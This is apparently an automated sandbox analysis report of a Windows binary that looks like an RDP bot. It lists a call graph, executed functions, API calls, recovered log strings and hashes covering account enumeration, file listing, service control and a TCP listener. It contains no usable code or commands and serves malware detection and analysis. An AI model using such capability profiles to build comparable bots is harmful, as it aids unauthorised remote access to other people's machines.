62118->62109 62119->62109 62121 7ff8bfb89274 62120->62121 62122 7ff8bfb8928c 62120->62122 62121->62122 62123 7ff8bfb8927d memset 62121->62123 62122->62083 62122->62084 62124 7ff8bfb89296 62123->62124 62124->62122 62125 7ff8bfb8923e 21 API calls 62124->62125 62126 7ff8bfb892c4 strchr 62124->62126 62125->62124 62126->62124 62127 7ff8bfb892db 62126->62127 62128 7ff8bfb81292 19 API calls 62127->62128 62128->62122 62129->62084 62131 7ff8bfb8195b 62130->62131 62132 7ff8bfb81979 WSAGetLastError 62130->62132 62133 7ff8bfb81292 19 API calls 62131->62133 62134 7ff8bfb81986 62132->62134 62135 7ff8bfb81971 closesocket 62132->62135 62133->62135 62136 7ff8bfb81292 19 API calls 62134->62136 62135->61849 62135->61850 62136->62135 62137 7ff708878a03 62138 7ff70887849a 116 API calls 62137->62138 62139 7ff708878a0d 62138->62139 62140 7ff708878a13 62139->62140 62141 7ff708878a72 RegisterServiceCtrlHandlerA 62139->62141 62156 7ff708878a1b 62140->62156 62157 7ff708878bff 62140->62157 62168 7ff7088781e0 SetServiceStatus 62140->62168 62142 7ff708878ab3 GetLastError 62141->62142 62143 7ff708878a92 62141->62143 62147 7ff7088799e2 6 API calls 62142->62147 62167 7ff7088781e0 SetServiceStatus 62143->62167 62146 7ff708878a3a 62170 7ff7088788ee 10 API calls 62146->62170 62147->62140 62148 7ff708878ba6 62152 7ff7088799e2 6 API calls 62148->62152 62149 7ff708878aa7 62153 7ff708878563 383 API calls 62149->62153 62158 7ff708878bc0 62152->62158 62153->62140 62154 7ff708878a3f 62171 7ff7088789aa 13 API calls 62154->62171 62156->62146 62169 7ff7088781e0 SetServiceStatus 62156->62169 62162 7ff708878c3b ExitProcess 62157->62162 62160 7ff708878bd6 62158->62160 62165 7ff70887886d 25 API calls 62158->62165 62159 7ff708878a44 62161 7ff708878a4c 62159->62161 62159->62162 62163 7ff7088799e2 6 API calls 62160->62163 62164 7ff708878a6b 62161->62164 62172 7ff7088781e0 SetServiceStatus 62161->62172 62163->62156 62165->62158 62167->62149 62168->62148 62169->62146 62170->62154 62171->62159 62172->62164

                    Executed Functions

                    Function 00007FF8B91538C3 Relevance: 54.6, APIs: 23, Strings: 8, Instructions: 332memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 799 7ff8b91538c3-7ff8b91538d9 call 7ff8b9151292 802 7ff8b9153d3e-7ff8b9153d42 799->802 803 7ff8b91538de 802->803 804 7ff8b9153d48-7ff8b9153d66 GetProcessHeap HeapAlloc 802->804 806 7ff8b91538e3-7ff8b91538e8 803->806 805 7ff8b9153d6c-7ff8b9153d82 call 7ff8b9151292 804->805 804->806 805->806 808 7ff8b91538ee-7ff8b91538fe LocalAlloc 806->808 809 7ff8b91539d4-7ff8b91539d9 806->809 810 7ff8b9153902-7ff8b9153907 808->810 809->810 812 7ff8b915390d-7ff8b915398b wcsncpy call 7ff8b915a05a LookupAccountNameW 810->812 813 7ff8b9153cb9 810->813 819 7ff8b915398d-7ff8b915398f 812->819 820 7ff8b91539de-7ff8b91539ea GetLastError 812->820 815 7ff8b9153cbe-7ff8b9153cc9 813->815 817 7ff8b9153ccf-7ff8b9153cd1 815->817 818 7ff8b9153d87 815->818 817->818 822 7ff8b9153cd7-7ff8b9153d38 wcslen GetProcessHeap HeapAlloc 817->822 821 7ff8b9153d8d-7ff8b9153d95 818->821 823 7ff8b9153b84-7ff8b9153b9c ConvertSidToStringSidA 819->823 824 7ff8b9153995-7ff8b91539b6 GetLastError call 7ff8b9151292 819->824 827 7ff8b91539ec-7ff8b91539ff call 7ff8b9151292 820->827 828 7ff8b9153a01-7ff8b9153a19 LocalAlloc 820->828 825 7ff8b9153d9c-7ff8b9153dac 821->825 826 7ff8b9153d97 NetApiBufferFree 821->826 822->799 822->802 835 7ff8b9153b9e-7ff8b9153ba5 823->835 836 7ff8b9153bd5-7ff8b9153bf9 GetLastError call 7ff8b9151292 823->836 853 7ff8b91539bc 824->853 854 7ff8b9153bfb-7ff8b9153c01 824->854 832 7ff8b9153ed7-7ff8b9153ede 825->832 833 7ff8b9153db2-7ff8b9153db4 825->833 826->825 827->824 829 7ff8b9153a1f-7ff8b9153a51 LookupAccountNameW 828->829 830 7ff8b9153b7a 828->830 839 7ff8b9153a61-7ff8b9153a82 GetLastError call 7ff8b9151292 829->839 840 7ff8b9153a53-7ff8b9153a5c LocalFree 829->840 830->823 841 7ff8b9153f1d-7ff8b9153f36 call 7ff8b9151292 832->841 842 7ff8b9153ee0-7ff8b9153ee2 832->842 833->832 845 7ff8b9153dba-7ff8b9153e24 NetUserEnum 833->845 837 7ff8b9153bab-7ff8b9153bd0 call 7ff8b9151292 835->837 838 7ff8b9153c81-7ff8b9153c86 835->838 836->835 837->815 838->815 868 7ff8b9153a9c-7ff8b9153aa2 839->868 869 7ff8b9153a84 839->869 840->819 871 7ff8b9153f38 841->871 872 7ff8b9153f57-7ff8b9153f5d 841->872 849 7ff8b9153ee8-7ff8b9153efe call 7ff8b915379f 842->849 850 7ff8b915402a-7ff8b9154044 call 7ff8b9151292 842->850 845->821 855 7ff8b9153e2a-7ff8b9153e30 845->855 883 7ff8b9153f0a-7ff8b9153f1c 849->883 893 7ff8b9153f05 call 7ff8b9151292 849->893 850->883 862 7ff8b9153c7a-7ff8b9153c7f 853->862 863 7ff8b91539c2-7ff8b9153c6a 853->863 860 7ff8b9153c8f-7ff8b9153c94 854->860 861 7ff8b9153c07-7ff8b9153c0d 854->861 855->821 865 7ff8b9153e36-7ff8b9153e6a GetProcessHeap HeapAlloc 855->865 860->815 873 7ff8b9153c0f-7ff8b9153c15 861->873 874 7ff8b9153c39-7ff8b9153c3c 861->874 862->815 863->815 866 7ff8b9153e70-7ff8b9153e7a 865->866 867 7ff8b91538a3-7ff8b91538be call 7ff8b9151292 865->867 876 7ff8b9153e7c-7ff8b9153eaf memcpy GetProcessHeap HeapFree 866->876 877 7ff8b9153eb5-7ff8b9153ed2 866->877 867->821 881 7ff8b9153aa8-7ff8b9153aae 868->881 882 7ff8b9153b34-7ff8b9153b39 868->882 878 7ff8b9153a8a-7ff8b9153a97 869->878 879 7ff8b9153b20-7ff8b9153b25 869->879 884 7ff8b9153f3e-7ff8b9153f4b 871->884 885 7ff8b9153fe2-7ff8b9153fe7 871->885 889 7ff8b9153fec 872->889 890 7ff8b9153f63 872->890 886 7ff8b9153cab-7ff8b9153cb0 873->886 887 7ff8b9153c1b-7ff8b9153c21 873->887 891 7ff8b9153c3e-7ff8b9153c41 874->891 892 7ff8b9153c4f-7ff8b9153c55 874->892 876->877 878->868 879->840 899 7ff8b9153ae0-7ff8b9153ae6 881->899 900 7ff8b9153ab0-7ff8b9153ab3 881->900 882->840 884->872 885->849 886->815 901 7ff8b9153c27-7ff8b9153c2d 887->901 902 7ff8b9153cb2-7ff8b9153cb7 887->902 915 7ff8b9153ff6-7ff8b9153ffb 889->915 896 7ff8b9153f98-7ff8b9153f9e 890->896 897 7ff8b9153f65-7ff8b9153f68 890->897 903 7ff8b9153c96-7ff8b9153c9b 891->903 904 7ff8b9153c43-7ff8b9153c46 891->904 894 7ff8b9153ca4-7ff8b9153ca9 892->894 895 7ff8b9153c57-7ff8b9153c5c 892->895 893->883 894->815 895->815 909 7ff8b9154014 896->909 910 7ff8b9153fa0-7ff8b9153fa6 896->910 907 7ff8b9153f6a-7ff8b9153f6d 897->907 908 7ff8b9153f86-7ff8b9153f8c 897->908 905 7ff8b9153b5c-7ff8b9153b61 899->905 906 7ff8b9153ae8-7ff8b9153aee 899->906 911 7ff8b9153ace-7ff8b9153ad4 900->911 912 7ff8b9153ab5-7ff8b9153ab8 900->912 913 7ff8b9153c5e-7ff8b9153c63 901->913 914 7ff8b9153c2f-7ff8b9153c34 901->914 902->815 903->815 916 7ff8b9153c9d-7ff8b9153ca2 904->916 917 7ff8b9153c48-7ff8b9153c4d 904->917 905->840 918 7ff8b9153b66-7ff8b9153b6b 906->918 919 7ff8b9153af0-7ff8b9153af6 906->919 907->915 920 7ff8b9153f73-7ff8b9153f76 907->920 921 7ff8b9153f8e-7ff8b9153f93 908->921 922 7ff8b915400a-7ff8b915400f 908->922 923 7ff8b915401e 909->923 910->923 924 7ff8b9153fa8-7ff8b9153fae 910->924 927 7ff8b9153ad6-7ff8b9153adb 911->927 928 7ff8b9153b52-7ff8b9153b57 911->928 925 7ff8b9153b3e-7ff8b9153b43 912->925 926 7ff8b9153abe-7ff8b9153ac1 912->926 913->815 914->815 915->849 916->815 917->815 918->840 929 7ff8b9153af8-7ff8b9153afd 919->929 930 7ff8b9153b70-7ff8b9153b75 919->930 931 7ff8b9153f7c-7ff8b9153f81 920->931 932 7ff8b9154000-7ff8b9154005 920->932 921->849 922->849 923->850 933 7ff8b9153fba-7ff8b9153fbf 924->933 934 7ff8b9153fb0-7ff8b9153fb5 924->934 925->840 935 7ff8b9153b48-7ff8b9153b4d 926->935 936 7ff8b9153ac7-7ff8b9153acc 926->936 927->840 928->840 929->840 930->840 931->849 932->849 933->849 934->849 935->840 936->840
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: AllocErrorLastLocal$AccountCriticalHeapLookupNameSection$CopyEnterFileFreeLeaveProcessfflushfwritewcsncpy
                    • String ID: D$[D] (%s) -> User found(name=%s,s_sid=%s,acct_expires=%x,last_logon=%x)$[E] (%s) -> ConvertSidToStringSid failed(gle=%lu)$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$sid_to_str$users_sync
                    • API String ID: 3624467404-104752423
                    • Opcode ID: 2c065d011c9ab7030f9672b503886fd27cb0c5ffb7622794d5e0c854782d74c2
                    • Instruction ID: f97704ef0d59d11db3e2192d24c36f60657465927338c1e70d9870f31ebe3acd
                    • Opcode Fuzzy Hash: 2c065d011c9ab7030f9672b503886fd27cb0c5ffb7622794d5e0c854782d74c2
                    • Instruction Fuzzy Hash: 26F15762A08A82C7EB608F1CE45437963A1EB85BD4F564036DB4E87398DF3DF846E741
                    Function 00007FF8BA504013 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 159filestringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    • Associated: 00000016.00000002.4543016103.00007FF8BA500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543075522.00007FF8BA513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543104552.00007FF8BA51C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543126131.00007FF8BA51F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543151844.00007FF8BA520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
                    • String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
                    • API String ID: 4253334766-243243391
                    • Opcode ID: 329fdf8127f5f1158765810408fb89e91592730f77661986c47c59f41f2ff3fe
                    • Instruction ID: bd2bdf33e10122a31ea8cb8447283695a2e6f47b78ec05a44b7e4fa42167a1b4
                    • Opcode Fuzzy Hash: 329fdf8127f5f1158765810408fb89e91592730f77661986c47c59f41f2ff3fe
                    • Instruction Fuzzy Hash: 51611DB5E0C683D5FB305ADDAC803B92260AF533D4F4451B2EE6E5A2E4DE2CBB458341
                    Function 00007FF708871CF3 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 159fileCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: Find$ErrorFileLast$CloseFirstNext_mbscpyfflushfwrite
                    • String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
                    • API String ID: 1094913617-243243391
                    • Opcode ID: af09da903b14395032e1ba6ca3dae6091f92bbea98b1b9bcb7bdc89db381bd11
                    • Instruction ID: cad9f485647c6ec14708d7541b60ed351917eef922ed8a74d1aeea2051f6efce
                    • Opcode Fuzzy Hash: af09da903b14395032e1ba6ca3dae6091f92bbea98b1b9bcb7bdc89db381bd11
                    • Instruction Fuzzy Hash: 36613E2AE3D95385FB60FA149C48BB8F260AF10358FD40133D85E57AD1DF2CE9A58369
                    Function 00007FF8B915387F Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 167memoryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: Heap$Free$Process$Local$AllocBufferEnumUsermemcpy
                    • String ID: [E] (%s) -> Failed(err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> NetUserEnum failed(enum_err=%08lx)$[I] (%s) -> Done(sam_user_num=%u)$mem_alloc$users_sync
                    • API String ID: 1361071942-3382179125
                    • Opcode ID: 12def299df3458bcfa48338576adbcb56069ab18652fada285a8cab9ade52bd0
                    • Instruction ID: d1b092fe55e559ef2bf61db313e48846db6f1cf5b48348ad783265ac7f33d98f
                    • Opcode Fuzzy Hash: 12def299df3458bcfa48338576adbcb56069ab18652fada285a8cab9ade52bd0
                    • Instruction Fuzzy Hash: 23619322A0C6C796FA219F0CE84037962A1AF857D4F664036DB4D476D0EE3EF886F711
                    Function 00007FF8BFAB15FA Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 89networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: ErrorLast$bindfflushfwritehtonlhtonslistensetsockoptsocket
                    • String ID: [E] (%s) -> bind failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> listen failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$tcp_listen
                    • API String ID: 3590747132-3524496754
                    • Opcode ID: 9ea2081c4a1fdd313a523ca3c587639682e00fdbf96388af516a9823ae8be453
                    • Instruction ID: c24fae04fa2e60828a87f49197b46eb6a80401236df1fc03fa6e287cb62acd1d
                    • Opcode Fuzzy Hash: 9ea2081c4a1fdd313a523ca3c587639682e00fdbf96388af516a9823ae8be453
                    • Instruction Fuzzy Hash: CC31A861A08A0646E6289BBDA81627577A0AF457FCF043335DF7E477E2EE3DE4498700
                    Function 00007FF708878C4A Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 120stringCOMMON
                    Download Yara Rule
                    APIs
                    • strcmp.MSVCRT ref: 00007FF708878C62
                    • strcmp.MSVCRT ref: 00007FF708878C75
                    • StartServiceCtrlDispatcherA.ADVAPI32 ref: 00007FF708878CB1
                    • _read.MSVCRT ref: 00007FF708878D07
                    • GetLastError.KERNEL32 ref: 00007FF708878D26
                      • Part of subcall function 00007FF7088788EE: FreeLibrary.KERNEL32(?,?,00000000,000001B9FFF913D0,00007FF708878CDE,?,?,?,?,?,?,00000001,00007FF708878E4A,?,?,00007FF7088884F8), ref: 00007FF70887892F
                      • Part of subcall function 00007FF7088788EE: GetProcessHeap.KERNEL32(?,?,00000000,000001B9FFF913D0,00007FF708878CDE,?,?,?,?,?,?,00000001,00007FF708878E4A,?,?,00007FF7088884F8), ref: 00007FF708878962
                      • Part of subcall function 00007FF7088788EE: HeapFree.KERNEL32(?,?,00000000,000001B9FFF913D0,00007FF708878CDE,?,?,?,?,?,?,00000001,00007FF708878E4A,?,?,00007FF7088884F8), ref: 00007FF708878973
                      • Part of subcall function 00007FF7088789AA: GetProcessHeap.KERNEL32(?,?,00000000,00007FF708878CE3,?,?,?,?,?,?,00000001,00007FF708878E4A,?,?,00007FF7088884F8,00000000), ref: 00007FF7088789DB
                      • Part of subcall function 00007FF7088789AA: HeapFree.KERNEL32(?,?,00000000,00007FF708878CE3,?,?,?,?,?,?,00000001,00007FF708878E4A,?,?,00007FF7088884F8,00000000), ref: 00007FF7088789EC
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: Heap$Free$Processstrcmp$CtrlDispatcherErrorLastLibraryServiceStart_read
                    • String ID: RDP-Controller$[E] (%s) -> No a valid run mode(mode=%s)$[E] (%s) -> StartServiceCtrlDispatcherA failed(GetLastError=%lu)$main$service$standalone
                    • API String ID: 3617873859-308889057
                    • Opcode ID: 632fe087bb1aecd27532cf3bc7a0e494a42c5e1ffc9089c655d61d3dd8c330ec
                    • Instruction ID: 2a1bc7ac514cd4760a71e6a8a3566bccf4914a20d6ebca4e60d1f52ec6ea1e9d
                    • Opcode Fuzzy Hash: 632fe087bb1aecd27532cf3bc7a0e494a42c5e1ffc9089c655d61d3dd8c330ec
                    • Instruction Fuzzy Hash: F6513B21E2D60381FA60F714AC88BB9D2B0AF59744FD41432D50E466E2DF5DE8E4873E
                    Function 00007FF708871131 Relevance: 13.6, APIs: 9, Instructions: 120sleepstringCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: _inittermmalloc$ExceptionFilterSleepUnhandled_amsg_exit_cexitstrlen
                    • String ID:
                    • API String ID: 3714283218-0
                    • Opcode ID: 423c7fadebe407afcbf8f11926be5113ac1f50ee7c1d89c8a253cd586a538a4a
                    • Instruction ID: 681d692235112c379164a904fae75d47fe6108224ba65d87b6be7bc68f26e93d
                    • Opcode Fuzzy Hash: 423c7fadebe407afcbf8f11926be5113ac1f50ee7c1d89c8a253cd586a538a4a
                    • Instruction Fuzzy Hash: 8D511A25A28A47C5EA51FB11EC54A79F3A0AF48B84F844435D90D8B7D1EF3CE4A0832C
                    Function 00007FF8B9152A1A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: ErrorLastrecv
                    • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                    • API String ID: 2514157807-65069805
                    • Opcode ID: 92f11da0d592137c33acb566b4c1e3a2f431a29a74f25d4b214e2cda57f86371
                    • Instruction ID: 6f5303a74057ad607c5b78138d8cd0fc7aeb99e52170f154457bfad031e27db1
                    • Opcode Fuzzy Hash: 92f11da0d592137c33acb566b4c1e3a2f431a29a74f25d4b214e2cda57f86371
                    • Instruction Fuzzy Hash: DA118C51E0C69381FA216F2DA8406B912106F427E4F529730DA3D9AAE5EF1CF946E300
                    Function 00007FF708872515 Relevance: 72.0, APIs: 24, Strings: 17, Instructions: 298fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 7ff708872515-7ff708872531 1 7ff7088725c7-7ff7088725f5 call 7ff7088799e2 0->1 2 7ff708872537-7ff70887253a 0->2 10 7ff708872722-7ff708872733 1->10 4 7ff7088725fa-7ff708872628 call 7ff7088799e2 2->4 5 7ff708872540-7ff708872544 2->5 4->10 8 7ff708872546-7ff70887254a 5->8 9 7ff708872550-7ff708872565 fopen 5->9 8->9 12 7ff70887262d-7ff70887265b call 7ff7088799e2 8->12 13 7ff70887256b-7ff708872580 fseek 9->13 14 7ff708872660-7ff708872689 _errno call 7ff7088799e2 _errno 9->14 15 7ff70887273c-7ff708872749 10->15 16 7ff708872735 10->16 12->10 19 7ff708872778-7ff708872785 call 7ff70887e478 13->19 20 7ff708872586-7ff7088725af _errno call 7ff7088799e2 _errno 13->20 29 7ff70887268b-7ff708872698 14->29 30 7ff7088726c0-7ff7088726d4 _errno 14->30 21 7ff708872abb 15->21 22 7ff70887274f-7ff708872760 call 7ff7088799e2 15->22 16->15 37 7ff708872787 19->37 38 7ff7088727b0-7ff7088727d9 _errno call 7ff7088799e2 _errno 19->38 32 7ff7088726f9-7ff708872707 _errno 20->32 33 7ff7088725b5-7ff7088725c2 20->33 35 7ff708872ac7-7ff708872ae0 call 7ff7088799e2 21->35 36 7ff708872765-7ff708872777 22->36 29->30 34 7ff70887270d-7ff708872710 30->34 32->34 33->1 39 7ff70887271a-7ff70887271c 34->39 40 7ff708872712-7ff708872715 fclose 34->40 35->36 43 7ff708872a9d-7ff708872aa2 37->43 44 7ff70887278d-7ff708872792 37->44 50 7ff7088727db-7ff7088727e8 38->50 51 7ff70887281f-7ff708872833 _errno 38->51 39->10 39->35 40->39 43->34 45 7ff708872838-7ff708872850 fseek 44->45 46 7ff708872798-7ff70887279d 44->46 52 7ff70887287a-7ff7088728a3 _errno call 7ff7088799e2 _errno 45->52 53 7ff708872852-7ff70887285e 45->53 46->45 49 7ff7088727a3-7ff7088727ab 46->49 49->34 50->51 51->34 63 7ff7088728e9-7ff7088728fd _errno 52->63 64 7ff7088728a5-7ff7088728b2 52->64 54 7ff708872864-7ff70887286a 53->54 55 7ff708872902-7ff708872924 GetProcessHeap HeapAlloc 53->55 58 7ff708872ab1-7ff708872ab6 54->58 59 7ff708872870-7ff708872875 54->59 55->54 57 7ff70887292a-7ff708872940 call 7ff7088799e2 55->57 57->54 58->34 62 7ff7088729b9-7ff7088729c8 59->62 66 7ff7088729ca-7ff7088729cc 62->66 67 7ff708872a05-7ff708872a0e 62->67 63->34 64->63 66->67 68 7ff7088729ce-7ff7088729f1 fread 66->68 69 7ff708872a3d-7ff708872a60 call 7ff7088799e2 67->69 70 7ff708872a10-7ff708872a12 67->70 68->67 72 7ff7088729f3 68->72 73 7ff708872a14-7ff708872a19 69->73 70->73 74 7ff708872a62-7ff708872a67 70->74 78 7ff7088729f9-7ff7088729fc 72->78 79 7ff708872945-7ff70887296e _errno call 7ff7088799e2 _errno 72->79 73->34 80 7ff708872a1f-7ff708872a38 GetProcessHeap HeapFree 73->80 76 7ff708872a69-7ff708872a6f 74->76 77 7ff708872a74-7ff708872a7d 74->77 76->34 77->76 78->62 83 7ff7088729a5-7ff7088729b3 _errno 79->83 84 7ff708872970-7ff70887297d 79->84 80->34 83->62 84->83
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: _errno$fclosefflushfopenfseekfwrite
